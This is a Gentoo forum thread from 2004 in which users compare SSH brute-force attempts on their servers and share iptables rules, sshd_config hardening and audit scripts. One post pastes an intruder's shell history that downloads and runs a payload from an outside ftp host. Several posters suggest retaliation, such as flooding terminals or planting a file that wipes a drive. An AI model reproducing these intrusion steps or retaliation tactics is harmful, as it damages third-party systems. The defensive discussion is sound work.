/sbin/iptables -A FILTER -p tcp --dport 25 -j ACCEPT
#/sbin/iptables -A FORWARD -p udp -i eth0 -s 192.168.0.0/24 -j QUEUE
#/sbin/iptables -A FORWARD -p tcp -i eth0 -s 192.168.0.0/24 -j QUEUE
#/sbin/iptables -A FORWARD -p tcp -i eth0 -s 192.168.0.0/24 -m string --string X-Kazaa -j QUEUE
/sbin/iptables -A FILTER -p tcp --dport 22 -j ACCEPT
/sbin/iptables -A FILTER -p tcp --dport 113 -j REJECT
# -o never matches on the INPUT path, so this is a no-op; anything not accepted
# above falls through to the INPUT DROP policy, which is what you want here
/sbin/iptables -A FILTER -o eth0 -j ACCEPT
/sbin/iptables -A LOKAL -j ACCEPT
# myinetIP is a placeholder for the box's public address
/sbin/iptables -t nat -A POSTROUTING -o eth1 -j SNAT --to-source myinetIP
/sbin/iptables -t nat -A PREROUTING -p tcp -i eth1 --dport 21 -j DNAT --to-destination 192.168.0.21
/sbin/iptables -t nat -A PREROUTING -p tcp -i eth1 --dport 3306 -j DNAT --to-destination 192.168.0.23
/sbin/iptables -A OUTPUT -m state -p icmp --state INVALID -j DROP
```

Paul..

----------
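revertex's list and Paulten's tips boil down to a handful of sshd_config settings (no root logins, no empty-password or password logins, only named users allowed) that are easy to get wrong by leaving the defaults commented out. The audit script below is an added example, not code from this thread or from OpenSSH; the defaults it assumes for unset keywords are stated in the code and should be checked against your version's sshd_config(5), and both config fragments are constructed.

```python
import re

# Settings this thread recommends: (keyword, assumed default when unset, safe
# values, finding). Defaults are an assumption based on sshd_config(5) for the
# OpenSSH of the period; newer releases changed PermitRootLogin's default.
CHECKS = [
    ("PermitRootLogin", "yes", {"no", "prohibit-password", "without-password"},
     "root can log in directly over ssh; set PermitRootLogin no"),
    ("PermitEmptyPasswords", "no", {"no"},
     "accounts with an empty password can log in; set PermitEmptyPasswords no"),
    ("PasswordAuthentication", "yes", {"no"},
     "passwords can be guessed over the network; use keys and set PasswordAuthentication no"),
]


def parse_sshd_config(text):
    """Return the effective top-level settings as {lowercase keyword: lowercase value}.

    Mirrors how sshd reads the file: comments and blank lines are skipped, keywords
    are case-insensitive, "key value" and "key=value" are both accepted, and the
    FIRST occurrence of a keyword wins. Everything after the first Match block is
    conditional and is ignored here (assumption: only global settings are audited).
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip().lower() if len(parts) > 1 else ""
        if key == "match":
            break
        settings.setdefault(key, value)
    return settings


def audit(text):
    """Return a list of findings for an sshd_config; an empty list means it passed."""
    settings = parse_sshd_config(text)
    findings = []
    for keyword, default, safe, message in CHECKS:
        value = settings.get(keyword.lower(), default)
        if value not in safe:
            findings.append(f"{keyword} {value}: {message}")
    if not (settings.get("allowusers") or settings.get("allowgroups")):
        findings.append("no AllowUsers/AllowGroups: every local account (a forgotten "
                        "'test' user included) is a valid ssh login target")
    return findings


# Constructed sample: a stock config with the defaults left commented out...
WEAK_CONFIG = """\
# (constructed) defaults commented out, so sshd silently uses them
#PermitRootLogin yes
#PasswordAuthentication yes
#PermitEmptyPasswords no
Subsystem sftp /usr/lib/misc/sftp-server
"""

# ...and the same file with the settings this thread recommends.
HARDENED_CONFIG = """\
# (constructed) key logins only, no root, and only the named account
PermitRootLogin no
PermitEmptyPasswords no
PasswordAuthentication no
PubkeyAuthentication yes
AllowUsers alice
Subsystem sftp /usr/lib/misc/sftp-server
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {audit(cfg) or ['ok']}")
```

Run `audit(open("/etc/ssh/sshd_config").read())` on a real box, and remember sshd only picks the change up after a restart.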

## TheUlk

Hi all,

I've seen a lot of those breakin-attempts but I don't care that much about it.

I allow just one user to ssh from one certain ip.

I hope this is enough to protect my computer from ssh-breakins.

cu tu

Suggestions welcome!

----------

## BlinkEye

 *skyfolly wrote:*   

> would it be more secure without SSH installed?
> 
> Damn it, I have to install iptables and chrootkit tonight right away.

 

of course it is. every piece of software installed (and running of course) increases the potential risk of reducing the security. if you don't use SSH, don't run it. what you do not use or need shouldn't be running

----------

## skyfolly

I am wondering if my server is behind a router, would that router's firewall enough to protect me from anything? I am using port 8080 as http port as 80 is blocked by ISP.

Hard to compromise my server through a router with limited ports open, right?

----------

## smart

You don't need to count closed ports anyway; only open ports count, and they count equally no matter if there are other ports closed by the router or closed due to the service being nonexistent.

----------

## BlinkEye

btw, i noticed: over 100 login attempts during the past few days   :Twisted Evil: 

----------

## kalisphoenix

user: test

pass: test

shell: /bin/analrapewithnailstuddedbroomstick.sh

I'm sure that there's some way to fuck someone up over ssh.  I mean, the connection goes both ways, right?

Of course, I suppose this could have indeterminate results depending on whether he sshed into PersonA's box, then from there to PersonB's, and then to mine.

I am paranoid... I've been noticing these for a few days and thought it was someone fuckin' with me.  Found this thread through pure chance.  Anyone else getting IPs in Germany, France, and elsewhere?

----------

## Jeremy_Z

Well, supposing there is a buffer overflow in the ssh client, yes, you could do some nasty retaliation   :Laughing: 

----------

## kalisphoenix

 *Quote:*   

> # ssh 131.120.22.14
> 
> Broadcast message from root (vc/1) (Sat Aug 21 03:25:02 2004):
> 
> Owned.
> ...

 

I think that'd be funny enough and keep the guy checking his computer for rootkits and scouring his hard drive for a couple hours.  Too bad I don't know jack about ssh or scripting.  I guess now's the time to learn...

----------

## dat

 *jpc82 wrote:*   

> Wow I am glad I saw this post.
> 
> I was just looking at my logs and I see this
> 
> ```
> ...

 

What were you using to generate logs like this??

----------

## BlinkEye

he wasn't using anything. these are logs from his system because someone tried (and failed) to login. 

this line is special though:

```
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT! 
```

which means, that he uses some security software.

----------

## NeddySeagoon

I've got some of these break in attempts.

The ones I have checked out all seem to come from *NIX boxes.

You can do whois <IP address from log> to get to the ISP, then send them the log fragment.

More interesting is telnet <IP address from log> 25 to connect to the smtp mail client on the box(es) that were tapping on your door. The ones I have tried all claim to be running sendmail, which suggests they are not windows boxes.

I've not sent mail that way yet; if the probes are coming from a block of dynamically assigned IP addresses, I could well spam the wrong user.

I've been tempted to open a 'honeypot' account that runs a script on every successful login to do the whois lookup, then email abuse@ISP with the log fragment or even email root@<IP _Addr> so innocent victims get to know their box is compromised.

----------

## kaidon

i've also noticed these kinds of break-in attempts starting around mid-July. 

found this thread on fulldisclosure explaining a bit what's going on:

http://archives.neohapsis.com/archives/fulldisclosure/2004-07/thread.html#1008

this worm/script/whatever seems to be finding tons of boxes with same/same accounts out there. the amount of hits is rapidly increasing. 

first it was solely checking for guest and test accounts. in the meantime it checks for guest, test, user, admin and tries multiple root passwords.

it's really becoming a plague.

cheers

k

----------

## den_RDC

 *BlinkEye wrote:*   

> he wasn't using anything. these are logs from his system because someone tried (and failed) to login. 
> 
> this line is special though:
> 
> ```
> ...

 

By coincidence, i have the same ip reported in my log files on one of the colocation servers i administer.

 *Quote:*   

> Aug 20 14:58:07 *hostname* sshd[25514]: reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!
> 
> 

 

Coincidentally, i happen to live in Belgium near the city of Gent ... Maybe i should organize a scriptkiddie manhunt  :Smile: .

I don't worry about these messages though - as long as you run a sensibly secured setup with decent passwords and/or keys and take all necessary precautions nothing is going to happen. This is probably some scriptkiddie running some l33t scripts he found on the net that checks for obvious/old vulns that world+dog-idiots have patched/fixed long ago.

Personally, my worst security nightmare is not having a box rooted (which is bad), but having a damn good hacker on your box and being none the wiser.

edit - i checked another 5 "assorted systems" (colos, my home router, etc) and found that they all have these login attempts. This thing is probably pretty widespread.

----------

## dat

 *BlinkEye wrote:*   

> he wasn't using anything. these are logs from his system because someone tried (and failed) to login. 
> 
> this line is special though:
> 
> ```
> ...

 

Yeah, that was the line that caught my eye too.  I figured he was using some different system logger than I use and that was adding those entries in there.  Anyone know what added security software he might be using?  Or more importantly, a good add-on to use? (Hopefully not too OT)

----------

## rtn

 *dat wrote:*   

>  *BlinkEye wrote:*   he wasn't using anything. these are logs from his system because someone tried (and failed) to login. 
> 
> this line is special though:
> 
> ```
> ...

 

That's actually from OpenSSH.  If you look in the file canohost.c in the openssh sources:

```
        if (getaddrinfo(name, NULL, &hints, &aitop) != 0) {

                logit("reverse mapping checking getaddrinfo for %.700s "

                    "failed - POSSIBLE BREAKIN ATTEMPT!", name);

                return xstrdup(ntop);

        }
```

--rtn

----------

## flappy

gdesklets + multitail - displays your log file to your desktop - i know straight away when someone tries to break in... the moment i see this i log into the attacking systems ssh with the username "f*ck" first then again with the username "off"

----------

## nielchiano

Once again, it is proven that an unprotected computer on the internet (either win or linux) is not safe unless YOU take some security steps.

This is how my server is secured (So far NO break-in attempts, but there will be, once upon a time): GUIDE:

Run SSH on a non-default port (i.e. NOT on TCP/22). Make your pick: 1022, 22022, ... you can go up to 65535.

to do this, edit /etc/ssh/sshd_config, look for (or insert) this rule:

```
Port 1022
```

(change 1022 for your port)

Of course, you'll have to specify on ALL the clients that will connect to use that port (ssh -p 1022 under linux).

Add a group called 'ssh' (or whatever) and add the users that should be able to log in to that group (to be done as root):

```
groupadd ssh
```

then edit /etc/group, look for the line starting with 'ssh' (or the name you just chose), and at the end add the list of users:

```
ssh:x:NNN:user1,user2,...
```

 (NNN will vary)

Allow only key logins:

You will need to have your key file with you all the time (e.g. on a USB stick).
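The three steps above checked mechanically, as an added example that is not part of nielchiano's post: a POSIX shell audit that reads an sshd_config the way sshd does (comments stripped, keyword case ignored, first occurrence wins) and reports which recommended settings are missing. The function names and the sample configs are constructed for this illustration.

```shell
#!/bin/sh
# Added example (not from the thread): audit an sshd_config against the
# steps above: a non-default Port, AllowGroups, key-only logins, plus
# PermitRootLogin no. sshd reads keywords case-insensitively, treats "#"
# as a comment, and keeps the FIRST occurrence of a keyword, so the
# checker does the same. Assumption: no Match blocks (this checker does
# not understand them; they did not exist in 2004-era OpenSSH).

# sshd_get CONFIG_TEXT KEYWORD DEFAULT: print the effective value of KEYWORD.
sshd_get() {
    printf '%s\n' "$1" | awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" -v def="$3" '
        { sub(/#.*/, "") }                              # drop comments
        NF >= 2 && tolower($1) == key { print $2; found = 1; exit }
        END { if (!found) print def }
    '
}

# sshd_audit CONFIG_TEXT: print one line per weak setting; return 1 if any.
# The DEFAULT arguments are the compiled-in OpenSSH defaults.
sshd_audit() {
    cfg="$1"; rc=0
    port=$(sshd_get "$cfg" Port 22)
    root=$(sshd_get "$cfg" PermitRootLogin yes)
    pass=$(sshd_get "$cfg" PasswordAuthentication yes)
    grp=$(sshd_get "$cfg" AllowGroups "")
    [ "$port" != 22 ] || { echo "Port 22: move sshd off the default port"; rc=1; }
    [ "$root" = no ]  || { echo "PermitRootLogin $root: set it to no"; rc=1; }
    [ "$pass" = no ]  || { echo "PasswordAuthentication $pass: allow key logins only"; rc=1; }
    [ -n "$grp" ]     || { echo "AllowGroups unset: restrict logins to one group (e.g. ssh)"; rc=1; }
    return $rc
}

# Constructed configs for the demonstration.
WEAK_CONF='# stock sshd_config: the commented lines show the built-in defaults
#Port 22
#PermitRootLogin yes
#PasswordAuthentication yes
Subsystem sftp /usr/lib/misc/sftp-server'

HARD_CONF='Port 1022
Protocol 2
permitrootlogin no
PasswordAuthentication no
PubkeyAuthentication yes
AllowGroups ssh'

# A common mistake: appending the fix at the end of the file changes nothing
# when the keyword already appears earlier, because the first value wins.
APPENDED_CONF='Port 2222
PermitRootLogin yes
PasswordAuthentication no
AllowGroups ssh
PermitRootLogin no'

echo "== stock ==";             sshd_audit "$WEAK_CONF" || echo "-> edit, then run: sshd -t"
echo "== hardened ==";          sshd_audit "$HARD_CONF" && echo "-> no findings"
echo "== fix appended too late =="; sshd_audit "$APPENDED_CONF" || true
# Live use: sshd_audit "$(cat /etc/ssh/sshd_config)"
```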

----------

## dyqik

Hmm, I have a selection of 6 or 7 attempts to login as test, NOUSER and root in my logs on the 22nd.  I have to connect to my work machine (which is connected to the UK academic network, no firewalls allowed beyond what the University provides) from a wide variety of clients, so the only real option for me is to use password SSH on a default port.  

On the other hand, I check the logs, and SSH and ICMP are the only open ports, so I think that that is secure enough for now.  They didn't seem to want to try and crack the passwords.  I'm going to disallow root SSH logins though.

----------

## dat

 *rtn wrote:*   

>  *dat wrote:*    *BlinkEye wrote:*   he wasn't using anything. these are logs from his system because someone tried (and failed) to login. 
> 
> this line is special though:
> 
> ```
> ...

 

Weird.. I use openssh and it doesn't log anything like that on failed login attempts.

UPDATE: nm, it's there..   :Rolling Eyes: 

----------

## froonk

I found such entries in my log, too. Anyway, I'm not very afraid of those 'attacks' since I pick my passwords very carefully (at least that's what I suppose). Although I'm a bit afraid that someone could bruteforce any of my accounts. Is there a way to increase the time sshd waits after a failed login? I took a quick look at the man page, but found nothing.

----------

## nielchiano

 *froonk wrote:*   

> I found such entries in my log, too. Anyway, I'm not very afraid of those 'attacks' since I pick my passwords very carefully (at least that's what I suppose). Although I'm a bit afraid that someone could bruteforce any of my accounts. Is there a way to increase the time sshd waits after a failed login? I took a quick look at the man page, but found nothing.

 

can't try it right now (at work), but I think you can do it if you tell SSHd to use PAM and configure that one

A note: If you have him wait for 5 seconds after a failed attempt; make sure that your firewall is also cooperative; else he'll just reconnect for each try; tell your firewall to allow only 1 connection per 5 seconds (from the same IP)
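One way to give the firewall the "only 1 connection per 5 seconds from the same IP" behaviour described above, as an added example that is not from the thread: iptables rules built on the netfilter recent match, produced by a shell function so they can be reviewed before being applied as root. The function names and the 192.168.0.0/24 trusted network are assumptions for the illustration.

```shell
#!/bin/sh
# Added example (not from the thread): make the firewall cooperate with an
# sshd login delay by letting each source address open at most one NEW
# connection to the SSH port every WINDOW seconds, using the netfilter
# "recent" match (ipt_recent). The commands are produced as text first
# so they can be reviewed, and applied separately with root privileges.

# ssh_ratelimit_rules PORT WINDOW [TRUSTED_NET]: print the iptables commands.
# TRUSTED_NET (e.g. the LAN) is exempted so you cannot lock yourself out
# from inside.
ssh_ratelimit_rules() {
    port="$1"; window="$2"; trusted="$3"
    echo "iptables -N SSH_LIMIT"
    echo "iptables -A INPUT -p tcp --dport $port -m state --state NEW -j SSH_LIMIT"
    [ -z "$trusted" ] || echo "iptables -A SSH_LIMIT -s $trusted -j ACCEPT"
    # record every new connection attempt from this source
    echo "iptables -A SSH_LIMIT -m recent --name ssh --set"
    # a second attempt inside the window is dropped; since every attempt is
    # recorded, a source that keeps hammering stays blocked until it has
    # been quiet for WINDOW seconds
    echo "iptables -A SSH_LIMIT -m recent --name ssh --update --seconds $window --hitcount 2 -j DROP"
    echo "iptables -A SSH_LIMIT -j ACCEPT"
}

# ssh_ratelimit_apply PORT WINDOW [TRUSTED_NET]: run the rules (root only).
ssh_ratelimit_apply() {
    [ "$(id -u)" -eq 0 ] || { echo "must be root" >&2; return 1; }
    ssh_ratelimit_rules "$@" | sh -e
}

# Caveats before applying:
# - this throttles connection setup only; pair it with sshd's own limits
#   (MaxAuthTries) so one connection cannot carry many guesses;
# - a lossy client's retransmitted SYN counts as a second attempt, so keep
#   WINDOW to a few seconds rather than tens of seconds.
ssh_ratelimit_rules 22 5 192.168.0.0/24
```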

----------

## bcore

Argh.. Just noticed some more stuff at the bottom of .bash_history.. I didn't even notice this before.. I had snipped the bottom part off, cause I saw my own typing, and figured this was a part of it.

```

ls

cd 1

ls

rm -rf run

rm -rf run.tar

uname -a

uptime

ftp powerkill.netfirms.com

ls

tar xzvf ranga.tgz

ls

rm -rf ranga.tgz

cd lib

ls

./crond

./crond

./crond

./crond

./crond

./crond

./crond

ls

cd 1/lib/

ls

find | grep sc

sc

ls randfiles/

tail /var/log/messages

[ true ]

exit

```

I think it's high time for a reformat. God knows what's on this box now.... damn.

----------

## Valhlalla

My system is set up to email me any failed logins, but since I'm paranoid I'm going to check anyway  :Razz: 

----------

## qzec

I think it's time for me to check my system.  :Shocked: 

Q

----------

## nok

There has indeed been a spate of these automated attempts to login to too-obvious accounts of computers running sshd;  since July I have had a long list of them for each computer I administer in the weekly logwatch report.

Some previous postings make this sound quite a desperate situation --- e.g., hardware firewall, portknocking, highly restrictive ip ranges allowed to connect, etc.  Somewhat following the attitude of the original post, I'd like to say I feel these are over-reactions, i.e. for most people any increase in security would be outweighed by expense or inconvenience.

Turn off unnecessary services.  

If having to run services for a local network that are not to be seen from the internet then consider a few simple iptables rules to ensure the services are blocked from the internet regardless of the services' own possible bugs or config file errors.  

Update sshd or other servers regularly (e.g. a cron job to emerge sync then check for keywords in the output of emerge -up world ).  

Consider forbidding ssh root logins -- a very good idea, since root is one username that no-one needs to guess.   

If you really only want to use ssh from a few known addresses, try limiting access by address. 

Above all, make sure user accounts have good passwords.

I'd be interested to hear comments on whether there have ever been linux iptables problems that would have made a hardware firewall a better option for preventing unwanted incoming connections.

Also, for those mentioning being "rooted" (without a `u'), do you mean the root password was guessed, or that some exploit was run as another user to become root?  What exploit?  Was it something in a standard gentoo installation?

Finally, try an automated reporting system such as logwatch -- a clever attacker who gains root would be able to hide the activities, but a wealth of information about system changes and failed  or successful logins is obtained in other circumstances!

----------

## dannycool

nok, rooted just means that the box was entirely compromised and an intruder got root access.

I've been working on a special ssh account on one of my boxes where you get a chrooted bash within a jail that's created on the fly, so after you log out the state of the jail is preserved and any following login would end up with a new jail...

But I'm unsure if I should really open up a ssh account. Even if it can't actually do much (except of course log what has been attempted to do).

----------

## mpalladi

I've just been 'done over' using a test:test account.

https://forums.gentoo.org/viewtopic.php?t=218822

What I can say is this:

I usually run ssh on a different port, and only had port 22 open and the test account created for a short time, a few hours whilst I was trying to get freenx working.

What I can't understand is even if someone *did* get into my test account, how did they root me? It must have been an exploit of some sort, but I am pretty up to date with emerge syncs and emerge -u system 

Mark

----------

## BlinkEye

 *dat wrote:*   

>  *rtn wrote:*    *dat wrote:*    *BlinkEye wrote:*   he wasn't using anything. these are logs from his system because someone tried (and failed) to login. 
> 
> this line is special though:
> 
> ```
> ...

 

i'm still very much interested in that feature because i use openSSH too! any hint?

----------

## BlinkEye

 *mpalladi wrote:*   

> I've just been 'done over' using a test:test account.
> 
> https://forums.gentoo.org/viewtopic.php?t=218822
> 
> What I can say is this:
> ...

 

well, i don't understand that either. but what makes you so sure he got root access? if he really did, we all have a problem

----------

## indanet

Thanks for this thread, very informative!

 *nok wrote:*   

> Consider forbidding ssh root logins -- a very good idea, since root is one username that no-one needs to guess.   
> 
> If you really only want to use ssh frrom a few known addresses, try limiting access by address.

That's a good point.  Is it possible to configure OpenSSHd in a way that allows root login from the local network, but not from outside?  I did not find information on the internet on how to do that.

My problem is, that my server has no keyboard attached, so it would be very handy if root login would be possible from the local network (although I could live without it).

EDIT: Could this goal be accomplished with /etc/login.access?  If I only wanted root to be able to login from 192.168.0.2, 192.168.0.4, 192.168.0.5 and e.g. the keyboard, I would write the following line into my login.access file:

```
# /etc/login.access

-:root:ALL EXCEPT 192.168.0.2 192.168.0.4 192.168.0.5 LOCAL
```

Would this file be valid?

Best regards

indanet

Last edited by indanet on Tue Sep 07, 2004 11:00 pm; edited 1 time in total

----------

## BlinkEye

use a key (RSA for example)

----------

## Zepp

 *indanet wrote:*   

> Thanks for this thread, very informative!
> 
>  *nok wrote:*   Consider forbidding ssh root logins -- a very good idea, since root is one username that no-one needs to guess.   
> 
> If you really only want to use ssh frrom a few known addresses, try limiting access by address. That's a good point.  Is it possible configure OpenSSHd in a way that allows root login from local network, but not from outside?  I did not find information on the internet how to do that.
> ...

 

don't allow root login and just have a regular user in the wheel group, so you can ssh in as whatever user and then su to get root access on your server.

----------

## indanet

 *Zepp wrote:*   

>  *indanet wrote:*   If I only wanted root to be able to login only from 192.168.0.2, 192.168.0.4, 192.168.0.5 and e.g. keyboard I would write the following line into my login.acces file:
> 
> ```
> # /etc/login.access
> 
> ...

 

Thanks for the info. I know that, but would the above login.access file be valid?  IMHO this would be a tad bit more comfortable. (I could simply try it out, but I don't want to end up being locked out of my server  :Smile: )

----------

## rav

I think I'm pretty safe, considering that even if I was running a sshd I wouldn't even be able to get to it myself due to this crappy modem. However I was wondering why root isn't blocked by default in the configs? Also has anyone got a script to automatically blacklist any remote address which tries to login with root, w/o just parsing the logs? 

Btw, '/var/log/messages' is for syslog-ng right? what's the equivalent log file for metalog? /var/log/everything/[date]?

----------

## indanet

 *rav wrote:*   

> Btw, '/var/log/messages' is for syslog-ng right? what's the equivalent log file for metalog? /var/log/everything/[date]?

 If you want to see the logs for sshd, look into /var/log/sshd.

----------

## nyteryda

 *evoweiss wrote:*   

> 
> 
> Unfortunately, I managed to accidently delete the email. Did anybody else receive something similar and how did they know I use a zywall router/firewall (lucky guess?).
> 
> 

 

Obviously I don't know for sure as your router/firewall is a different make to mine, but on my router it's pretty easy to tell who makes it...

```
nmap -sS -O -PI -PT <ROUTER-IP-ADDRESS>
```

----------

## nyteryda

 *kalisphoenix wrote:*   

> 
> 
> I'm sure that there's some way to fuck someone up over ssh.  I mean, the connection goes both ways, right?
> 
> 

 

Create a user with next to no rights (chroot ssh, just in case) , called test with password test, in his home directory, create a windows exe file that deletes his C:\ Drive and call it my-hardcore-pornlinks.exe  :Razz: 

----------

## Koon

 *mpalladi wrote:*   

> What I can't understand is even iff somone *did* get into my test account, how did they root me ? It must have been an exploit of some sort, but I am pretty up to date with emerge sync's and emerge -u system

 

Privilege escalation can be done through SUID-packages bugs and (more often) kernel bugs. emerge -u system won't upgrade your kernels. Advice : follow GLSAs and upgrade kernels too.

-- 

Koon

Gentoo Linux Security Team

----------

## amne

 *rav wrote:*   

> Btw, '/var/log/messages' is for syslog-ng right? what's the equivalent log file for metalog? /var/log/everything/[date]?

 

/var/log/everything/current is the one used at the moment, the ones with a date are older versions (Usually one for every day).

----------

## WhimpyPeon

Good thread.  I am far from the expert on security, however I finally just broke down and got a firewall/router/switch at the local store.  I shelled out about $150 and got an 8 port switch with router and firewall functions.  In advance it was a Netgear FVS318 but other vendors have similar things out there.

By the time you take into consideration the time spent tweaking your firewall rules it is worth that much to me.  I ssh from work to an obscure port and the firewall redirects it to the standard ssh port on my gentoo box.  The firewall ignores (stealth) any requests not from my work ip.

Gentoo can do about anything, but in the end I thought it was money well spent.

----------

## PaV

you can always try some iptables script, like ipkungfu (which im using). i find iptables much easier to configure that way.

----------

## evoweiss

 *WhimpyPeon wrote:*   

> Gentoo can do bout anything, but in the end I thought it was money well spent.

 

I thought the same thing when deciding how to secure my system, i.e., buying a router made security one less thing to worry about and provided the extra ports in case I had company, etc.

Also, I had a lot of hits on port 22 today (~120 from the same IP address). Thankfully, I am careful about passwords and accounts and nothing happened. However, I am beginning to think that I'd like to take the extra step and switch ssh over to some obscure port. Would I be right in assuming that I need to modify the sshd_config file by uncommenting the port line and giving it another port?

Also, is there a way I can determine which ports are not in use?

Best,

Alex

----------

## electric_hamster

 *kalisphoenix wrote:*   

> I'm sure that there's some way to fuck someone up over ssh.  I mean, the connection goes both ways, right?

 

Doesn't actually fuck them up, but I've used it a few times on people who've annoyed me:

```
cat /dev/urandom | write USER
```

It certainly results in a "WTF" moment for them  :Smile: 

----------

## BlinkEye

 *evoweiss wrote:*   

>  *WhimpyPeon wrote:*   Gentoo can do bout anything, but in the end I thought it was money well spent. 
> 
> I thought the same thing when deciding how to secure my system, i.e., buying a router made security one less thing to worry about and provided the extra ports in case I had company, etc.
> 
> Also, I had a lot of hits on port 22 today (~120 from the same IP address). Thankfully, I am careful about passwords and accounts and nothing happened. However, I am beginning to think that I'd like to take the extra step and switch ssh over to some obscure port. Would I be right in assuming that I need to modify the sshd_config file by uncommenting the port line and giving it another port?
> ...

 

this is done easily with

```
nmap domainname
```

there are quite a lot more options you might wanna use (type nmap --help), for example to spy out the operating system, or to narrow the search. two things to remember:

1. nmap-ing some host is called portknocking, which some or even most users consider an attack. it's comparable to checking someone's house to see if a door is open - although you're not entering it (yet). but you see, in fact it's really impolite and would cause a sensation in real life

2. if you or someone else uses some sort of firewall (for example iptables) you may simply drop or prohibit "pings" => it takes VERY long to scan a host (i recently had iptables which took 70 minutes to scan my box - i'm not at all an expert in that field and don't use these rules anymore - it's just for the record). so, for your box, ssh into it and do a 

```
nmap localhost
```

for your question about changing the port sshd runs on: yes, you may simply change 

```
Port 22
```

to whatever you want to (i suggest a really high number, i.e. <= 2^16)

[EDIT]nmap is a tool you'll have to emerge: net-analyzer/nmap[/EDIT]

----------

## BlinkEye

 *electric_hamster wrote:*   

>  *kalisphoenix wrote:*   I'm sure that there's some way to fuck someone up over ssh.  I mean, the connection goes both ways, right? 
> 
> Doesn't actually fuck them up, but I've used it a few times on people who've annoyed me:
> 
> ```
> ...

 

that's a good idea. but i don't like the idea having someone logged in i don't want to at all

----------

## ReneeTeunissen

 *evoweiss wrote:*   

> Over the past few weeks I've noticed a similar pattern of hack attempts against my box (ssh'ing in and attempting to log in with things like "test", "NOUSER", and "root").

 

Well, first thing I do is to ADD a second account "root" (e.g. toor or something like that) and remove the shell from the real root, e.g. a small script as login shell which will email you, or /bin/false.

 *evoweiss wrote:*   

> Another thing I did was invest in a hardware firewall (Zywall 1 model) which will send me an email whenever there are any events whether legitimate (me ssh'ing into my system from work) or illegitimate (attacks on my system, other attempt to gain access via ssh). I highly recommend the same to others.

 

guess what the firewall is running. There are no such things as hardware firewalls. You bought a small single-board PC-like device with some network inputs and outputs - with linux, bsd or any embedded OS on it - which just does IP filtering as ipfilter/netfilter does.

Because these things run - mostly - on non-Intel CPUs it is probably more secure against trojans and other precompiled hacker stuff, but that's about all. 

Running an old box with linux and two network cards in it and just doing IP filtering and forwarding gives you about the same security level, probably even better. Except if you start running applications on it which can be exploited. If you add tools like snort you can detect and reject ssh sessions on non-standard ports. Anyway, having a nice black box of a firewall does not make you safer than a well configured linux box.

----------

## WhimpyPeon

evoweiss

You can change the port sshd listens on in /etc/ssh/sshd_config.

I use ports used by other services not used by me (i.e. kazaa, morpheus...).

----------

## echo6

A couple of things.

/etc/hosts.allow is only appropriate if you are using tcp-wrappers,  so emerge that.

There has been a brute force ssh password checker released to the wild which does exactly what is being seen here,  that is checking root,  test and guest accounts and using a dictionary attack.   So make sure that you have strong passwords and frequently change them.  Disable root login and use a non default account.

I used to bind my ssh port to a non default port,  but personally I don't think it makes that much of a difference,  you can usually tell if a port is expecting a ssh connection.

----------

## coutts99

 *Quote:*   

> 1. nmap-ing some host is called portknocking, which some or even most of the user consider as an attack. it's comparable on checking someone's house to see if a door is open - although you're not entering it (yet). but you see, in fact it's really unpolite and would cause a sensation in real life

 

No it isn't, this is portknocking -:

Port knocking is a method of establishing a connection to a networked computer that has no open ports. Before a connection is established, ports are opened using a port knock sequence, which is a series of connection attempts to closed ports. A remote host generates and sends an authentic knock sequence in order to manipulate the server's firewall rules to open one or more specific ports. These manipulations are mediated by a port knock daemon, running on the server, which monitors the firewall log file for connection attempts which can be translated into authentic knock sequences. Once the desired ports are opened, the remote host can establish a connection and begin a session. Another knock sequence may be used to trigger the closing of the port.

----------

## BlinkEye

i knew someone was gonna say that. i know what portknocking is, i tried to make an allegory, but i shouldn't have used a word that already exists. i compared it with "real life" as nmap-ing really is a port-knocking, i.e. a method to find open/closed doors.

for further infos about portknocking (the method mentioned by coutts99), see this thread (which i'm following myself): https://forums.gentoo.org/viewtopic.php?p=1462199#1462199

----------

## darkcoder

 *bcore wrote:*   

> /var/log/messages with some serious grep action.

 

I got a system with metalog which does not create /var/log/messages.  I only got /var/log/everything.  Is that the place I need to look at in my case?

----------

## darkcoder

but I got a gentoo box at work that is currently on testing, to replace oldy rh8 boxes, and since I used syslog-ng on those, I checked its /var/log/messages and found this:

```
Jul 15 20:49:44 pop sshd[19198]: Illegal user test from ::ffff:131.234.36.152

Jul 15 20:49:44 pop sshd[19198]: error: Could not get shadow information for NOUSER

Jul 15 20:49:44 pop sshd[19198]: Failed password for illegal user test from ::ffff:131.234.36.152 port 34406 ssh2

Jul 15 20:49:45 pop sshd[19200]: User guest not allowed because shell /dev/null is not executable

Jul 15 20:49:45 pop sshd[19200]: error: Could not get shadow information for NOUSER
```

  That means someone tried to get inside my box?

----------

## BlinkEye

 *darkcoder wrote:*   

> but I got a gentoo box at work that its currently on testing, to replace oldy rh8 boxes and since I used syslog-ng on those, I check its /var/log/messages and found this:
> 
> ```
> Jul 15 20:49:44 pop sshd[19198]: Illegal user test from ::ffff:131.234.36.152
> 
> ...

 

yes it does.

----------

## groovin

i don't think this attack necessarily aims at some known or unknown exploit... it just simply looks for carelessly set up boxes.

startling wake-up call to the number of spread-eagle boxes out there... 

test:test user:user etc sounds very M$-like.

----------

## Naffer

Ha, I've had my box set up less than a week and I just noticed this intrusion attempt:


```
Sep  4 20:35:53 [sshd] Illegal user test from 213.239.58.119

Sep  4 20:35:54 [sshd] error: Could not get shadow information for NOUSER

Sep  4 20:35:54 [sshd] Failed password for illegal user test from 213.239.58.119 port 2898 ssh2

Sep  4 20:35:55 [sshd] Failed password for guest from 213.239.58.119 port 2944 ssh2

Sep  4 20:35:56 [sshd] Illegal user admin from 213.239.58.119

Sep  4 20:35:56 [sshd] error: Could not get shadow information for NOUSER

Sep  4 20:35:57 [sshd] Failed password for illegal user admin from 213.239.58.119 port 2976 ssh2

Sep  4 20:35:58 [sshd] Illegal user admin from 213.239.58.119

Sep  4 20:35:58 [sshd] error: Could not get shadow information for NOUSER

Sep  4 20:35:58 [sshd] Failed password for illegal user admin from 213.239.58.119 port 3013 ssh2

Sep  4 20:35:59 [sshd] Illegal user user from 213.239.58.119

